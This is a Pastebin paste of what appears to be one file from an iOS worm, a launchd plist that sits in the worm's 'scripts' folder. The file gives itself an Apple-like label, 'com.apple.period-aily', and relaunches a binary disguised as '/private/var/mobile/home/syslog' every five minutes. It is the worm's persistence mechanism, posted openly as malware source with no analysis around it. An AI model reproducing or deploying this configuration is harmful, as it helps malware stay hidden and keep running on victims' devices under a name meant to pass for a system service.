Advertisement
FlyFar

worm/scripts/com.apple.period.plist

Mar 24th, 2024
697
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 0.47 KB | Cybersecurity | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
  3. <plist version="1.0">
  4.         <dict>
  5.             <key>Label</key>
  6.                 <string>com.apple.period-aily</string>
  7.             <key>ProgramArguments</key>
  8.             <array>
  9.                 <string>/private/var/mobile/home/syslog</string>
  10.             </array>
  11.              <key>StartInterval</key>
  12.                 <integer>300</integer>
  13.         </dict>
  14. </plist>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement